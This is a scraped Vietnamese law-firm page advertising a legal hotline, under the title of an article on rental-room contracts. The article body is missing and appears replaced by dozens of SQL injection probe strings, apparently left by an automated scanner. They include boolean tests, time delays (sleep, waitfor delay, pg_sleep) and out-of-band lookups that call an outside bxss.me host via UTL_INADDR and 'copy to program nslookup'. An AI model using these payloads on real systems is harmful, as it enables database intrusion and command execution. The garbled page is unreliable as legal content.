Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Hợp đồng cho thuê nhà trọ

Cập nhật lần cuối lúc 15:22 ngày 21/05/2014

Nguồn: Công ty Luật Vinabiz/ Nguoiduatin.vn
1
1
1
1
1'"
-1 OR 2+218-218-1=0+0+0+1 --
-1 OR 3+218-218-1=0+0+0+1 --
\
-1 OR 3*2<(0+5+218-218) --
1
@@w7CaG
-1 OR 3*2>(0+5+218-218) --
JyI=
-1 OR 2+408-408-1=0+0+0+1
-1 OR 3+408-408-1=0+0+0+1
-1 OR 3*2<(0+5+408-408)
-1 OR 3*2>(0+5+408-408)
-1' OR 2+198-198-1=0+0+0+1 --
-1' OR 3+198-198-1=0+0+0+1 --
-1' OR 3*2<(0+5+198-198) --
-1' OR 3*2>(0+5+198-198) --
-1' OR 2+994-994-1=0+0+0+1 or '4QMZkBX3'='
-1' OR 3+994-994-1=0+0+0+1 or '4QMZkBX3'='
-1' OR 3*2<(0+5+994-994) or '4QMZkBX3'='
-1' OR 3*2>(0+5+994-994) or '4QMZkBX3'='
-1" OR 2+774-774-1=0+0+0+1 --
-1" OR 3+774-774-1=0+0+0+1 --
-1" OR 3*2<(0+5+774-774) --
-1" OR 3*2>(0+5+774-774) --
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
-1; waitfor delay '0:0:6' --
-1); waitfor delay '0:0:9' --
1 waitfor delay '0:0:9' --
6fjwOirF'; waitfor delay '0:0:6' --
u40WGN8T'; waitfor delay '0:0:0' --
785kLzhQ'; waitfor delay '0:0:9' --
-1;select pg_sleep(9); --
-1);select pg_sleep(9); --
-1));select pg_sleep(3); --
-1));select pg_sleep(0); --
abU4pLUK';select pg_sleep(3); --
KVNYedca');select pg_sleep(6); --
GBpSYDIH');select pg_sleep(0); --
Zw6ISlfu');select pg_sleep(9); --
sNfXH7k2'));select pg_sleep(9); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-4813.34060.d7cfd.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-4814.34060.d7cfd.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-4815.34060.d7cfd.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-4817.34060.d7cfd.\1.bxss.me
622'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: